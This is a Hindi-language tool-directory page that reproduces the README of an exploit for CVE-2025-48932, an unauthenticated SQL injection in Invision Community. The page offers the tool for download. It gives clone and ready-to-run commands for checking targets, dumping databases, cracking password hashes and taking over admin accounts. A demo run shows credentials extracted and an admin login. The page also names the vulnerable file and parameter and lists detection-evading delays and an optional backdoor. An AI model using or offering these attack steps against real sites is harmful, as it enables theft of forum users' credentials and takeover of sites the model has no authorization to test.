Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationWeb SecurityPenetration Testing

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

रिपॉजिटरी देखें
118 दिन पहलेअभी तक समीक्षित नहीं

CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna

साझा करें

🔓 CVE-2025-48932 - Invision Community SQL इंजेक्शन एक्सप्लॉइट

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ गंभीर भेद्यता अवलोकन

CVE-2025-48932 Invision Community संस्करण ≤ 4.7.20 में खोजी गई एक गंभीर अप्रमाणित ब्लाइंड SQL इंजेक्शन भेद्यता है। यह एक्सप्लॉइट दूरस्थ हमलावरों को अनुमति देता है:

  • 🔍 संवेदनशील डेटाबेस जानकारी निकालें
  • 👤 उपयोगकर्ता क्रेडेंशियल और पासवर्ड हैश चुराएं
  • 🔑 व्यवस्थापक खातों पर कब्जा करें
  • 🎯 सक्रिय उपयोगकर्ता सत्रों को हाईजैक करें
  • 💻 व्यवस्थापक अधिग्रहण के माध्यम से रिमोट कोड निष्पादन (RCE) प्राप्त करें
  • 📊 संपूर्ण डेटाबेस सामग्री डंप करें

🎯 विशेषताएं


📊 डेमो और स्क्रीनशॉट

एक्सप्लॉइट निष्पादन

root@kitploit:~
$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

नमूना JSON आउटपुट

root@kitploit:~
{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 त्वरित आरंभ मार्गदर्शिका

स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# No dependencies to install! Just run it.

मूल उपयोग

root@kitploit:~
# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only

# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v

# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Save results to custom file
python3 exploit.py -u https://example.com -o results.json

# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10

# Dump all available data
python3 exploit.py -u https://example.com --dump-all

उन्नत उपयोग

root@kitploit:~
# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json

# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug

📋 आवश्यकताएं

सिस्टम आवश्यकताएं

  • Python: 3.6 या उच्चतर
  • OS: Linux, Windows, macOS (Python वाला कोई भी OS)
  • Memory: न्यूनतम (~50MB RAM)
  • Storage: ~100KB (केवल एक्सप्लॉइट)

निर्भरताएं

root@kitploit:~
✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!

वैकल्पिक (पासवर्ड क्रैकिंग के लिए)

  • Wordlist: rockyou.txt या कोई भी कस्टम वर्डलिस्ट
    root@kitploit:~
    # Download popular wordlist
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ तकनीकी विवरण

भेद्यता स्थान

  • फ़ाइल: /applications/calendar/modules/front/calendar/view.php
  • विधि: IPS\calendar\modules\front\calendar\view::search()
  • पैरामीटर: location (उपयोगकर्ता-आपूर्ति इनपुट)
  • प्रकार: बूलियन-आधारित ब्लाइंड SQL इंजेक्शन

हमला वेक्टर

root@kitploit:~
GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

शोषण श्रृंखला

  1. पहचान: बूलियन-आधारित इंजेक्शन पहचान
  2. गणना: डेटाबेस संरचना निकालें
  3. निष्कर्षण: संवेदनशील डेटा डंप करें
  4. क्रेडेंशियल चोरी: उपयोगकर्ता क्रेडेंशियल निकालें
  5. विशेषाधिकार वृद्धि: व्यवस्थापक खाता अधिग्रहण
  6. सत्र हाईजैकिंग: सक्रिय सत्र चुराएं
  7. स्थिरता: बैकडोर स्थापित करें (वैकल्पिक)

समर्थित डेटाबेस संस्करण

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 सुरक्षा और कानूनी सूचना

⚠️ महत्वपूर्ण अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।

इस उपकरण का उपयोग करके, आप सहमत हैं:

  • केवल उन प्रणालियों पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है
  • अवैध या दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग न करें
  • सभी लागू कानूनों और विनियमों का पालन करें
  • अपने कार्यों की पूरी जिम्मेदारी स्वीकार करें

कंप्यूटर प्रणालियों तक अनधिकृत पहुंच अवैध और अनैतिक है।

जिम्मेदार प्रकटीकरण

  • विक्रेता: Invision Community
  • प्रकट किया गया: 16 मई, 2025
  • पैच किया गया: संस्करण 4.7.21 (27 मई, 2025)
  • CVE: CVE-2025-48932 निर्दिष्ट

📚 दस्तावेज़ीकरण

एक्सप्लॉइट तर्क

रिपोर्ट संरचना

root@kitploit:~
invision_exploit_report_[timestamp].json
├── target                 # Target URL
├── timestamp              # Exploit timestamp
├── vulnerable             # Vulnerability status
├── database               # Database information
├── databases              # List of databases
├── tables                 # List of tables
├── credentials            # Extracted credentials
├── admin_info             # Admin user information
└── summary                # Exploitation summary

🎯 उपयोग के मामले

सुरक्षा शोधकर्ताओं के लिए

  • ✅ भेद्यता सत्यापन
  • ✅ प्रूफ ऑफ कॉन्सेप्ट विकास
  • ✅ सुरक्षा मूल्यांकन
  • ✅ बग बाउंटी हंटिंग

पेनेट्रेशन परीक्षकों के लिए

  • ✅ बाहरी/आंतरिक पेनेट्रेशन परीक्षण
  • ✅ रेड टीम संचालन
  • ✅ भेद्यता सत्यापन
  • ✅ अनुपालन परीक्षण

सिस्टम प्रशासकों के लिए

  • ✅ अपनी प्रणालियों का सुरक्षा ऑडिट
  • ✅ पैच सत्यापन
  • ✅ घटना प्रतिक्रिया जांच
  • ✅ सुरक्षा स्थिति मूल्यांकन

🐛 समस्या निवारण

सामान्य समस्याएं और समाधान

समस्या: कनेक्शन टाइमआउट

root@kitploit:~
# Solution: Increase timeout or check network
python3 exploit.py -u https://example.com --timeout 60

समस्या: SSL प्रमाणपत्र त्रुटियां

root@kitploit:~
# Solution: Disable SSL verification (not recommended for production)
python3 exploit.py -u https://example.com --no-verify-ssl

समस्या: रेट लिमिटिंग का पता चला

root@kitploit:~
# Solution: Reduce threads and increase delays
python3 exploit.py -u https://example.com -t 2 --delay 2

समस्या: कोई भेद्य पैरामीटर नहीं मिला

root@kitploit:~
# Solution: Ensure calendar app is installed and GeoLocation is enabled
# Check: /applications/calendar/modules/front/calendar/view.php exists

📖 संदर्भ

आधिकारिक संसाधन

  • CVE-2025-48932
  • Invision Community
  • Invision सुरक्षा बुलेटिन
  • मूल एडवाइजरी

तकनीकी संदर्भ

  • OWASP SQL Injection
  • Blind SQL Injection
  • MySQL दस्तावेज़ीकरण

संबंधित CVE

  • CVE-2024-xxxxx (पिछली Invision भेद्यताएं)
  • CVE-2023-xxxxx (संबंधित कम्युनिटी प्लेटफ़ॉर्म CVE)

🤝 योगदान

हम योगदान का स्वागत करते हैं! कृपया हमारे योगदान दिशानिर्देश देखें।

योगदान कैसे करें

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं (git checkout -b feature/AmazingFeature)
  3. परिवर्तन कमिट करें (git commit -m 'Add some AmazingFeature')
  4. ब्रांच पर पुश करें (git push origin feature/AmazingFeature)
  5. एक पुल रिक्वेस्ट खोलें

समस्याओं की रिपोर्ट करें

  • 🐛 बग रिपोर्ट
  • 💡 फीचर अनुरोध
  • 🔒 सुरक्षा समस्या

👨‍💻 लेखक

Sudeepa Wanigarathna

सुरक्षा शोधकर्ता और बग बाउंटी हंटर

  • 🌐 GitHub
  • 🐦 Twitter
  • 💼 LinkedIn
  • 📧 ईमेल

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ अपना समर्थन दिखाएं

यदि इस प्रोजेक्ट ने आपकी मदद की या आपको यह रोचक लगा:

  • ⭐ इस रिपॉजिटरी को स्टार करें
  • 🔗 इसे अपने नेटवर्क के साथ साझा करें
  • 📢 अपने सुरक्षा शोध में उल्लेख करें
  • 🤝 इसे बेहतर बनाने के लिए योगदान दें

🙏 आभार

Sudeepa Wanigarathna

साइबर सुरक्षा शोधकर्ता | सॉफ्टवेयर इंजीनियर | CTF इंजीनियर

यह प्रोजेक्ट सुरक्षा शोध, रक्षात्मक विश्लेषण और अधिकृत पेनेट्रेशन परीक्षण के लिए प्रदान किया गया है। उपयोगकर्ता सभी लागू कानूनों का पालन करने और उपयोग से पहले उचित अधिकार प्राप्त करने के लिए जिम्मेदार हैं।

टूल डाउनलोड करें
विशेषताविवरणस्थिति
🚀 शून्य निर्भरताएंशुद्ध Python मानक पुस्तकालय - pip इंस्टॉल की आवश्यकता नहीं✅
⚡ मल्टी-थ्रेडेडकॉन्फ़िगर करने योग्य थ्रेड्स के साथ बिजली-तेज़ डेटा निष्कर्षण✅
🤖 पूर्णतः स्वचालितपहचान से रिपोर्टिंग तक पूर्ण शोषण श्रृंखला✅
👑 व्यवस्थापक अधिग्रहणसत्र हाईजैकिंग और विशेषाधिकार वृद्धि✅
🔑 क्रेडेंशियल डंपिंगउपयोगकर्ता, पासवर्ड हैश, ईमेल निकालें✅
🔓 पासवर्ड क्रैकिंगवर्डलिस्ट समर्थन के साथ अंतर्निहित हैश क्रैकिंग✅
📋 JSON रिपोर्टिंगविश्लेषण और दस्तावेज़ीकरण के लिए संरचित आउटपुट✅
🔌 प्रॉक्सी समर्थनBurp Suite और कस्टम प्रॉक्सी एकीकरण✅
🎨 रंगीन आउटपुटप्रगति संकेतकों के साथ सुंदर टर्मिनल आउटपुट✅
🛡️ रेट लिमिटिंगपहचान से बचने के लिए अंतर्निहित विलंब✅
तर्कविवरणउदाहरण
-u, --urlलक्ष्य URL (आवश्यक)-u https://example.com
-p, --proxyप्रॉक्सी URL-p http://127.0.0.1:8080
-t, --threadsथ्रेड्स की संख्या (डिफ़ॉल्ट: 5)-t 10
-o, --outputपरिणामों के लिए आउटपुट फ़ाइल-o results.json
-v, --verboseविस्तृत आउटपुट सक्षम करें-v
--check-onlyकेवल भेद्यता जांचें--check-only
--dump-allसभी उपलब्ध डेटा डंप करें--dump-all
--wordlistक्रैकिंग के लिए वर्डलिस्ट फ़ाइल--wordlist rockyou.txt